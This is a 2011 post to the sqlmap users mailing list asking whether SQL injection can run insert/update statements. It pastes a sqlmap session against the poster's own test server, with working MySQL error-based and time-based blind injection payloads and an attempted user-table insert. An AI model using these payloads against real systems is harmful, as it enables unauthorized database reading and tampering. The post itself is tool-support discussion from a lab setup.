Hi,
is it possible to make "insert/update" queries via sql injection bugs?
I tried at my test machine via "--sql-query", but i didn't see query in
request_uri:
(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
--sql-query="insert into users set user='aaa',pass='bbb';"
sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover
tool
http://sqlmap.sourceforge.net
[*] starting at: 21:07:53
[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as
session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 1212 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into
users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None
[21:07:54] [INFO] Fetched data logged to text files under
'/home/admin/sqlmap-dev/output/10.0.0.60'
[*] shutting down at: 21:07:54
(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close
HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8
HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port
80</address>
SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok
############################################################################
--
Kirill Morozov
KIMO2-RIPE, RHCE
------------------------------------------------------------------------------
WhatsUp Gold - Download Free Network Management Software
The most intuitive, comprehensive, and cost-effective network
management toolset available today. Delivers lowest initial
acquisition cost and overall TCO of any competing solution.
http://p.sf.net/sfu/whatsupgold-sd
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
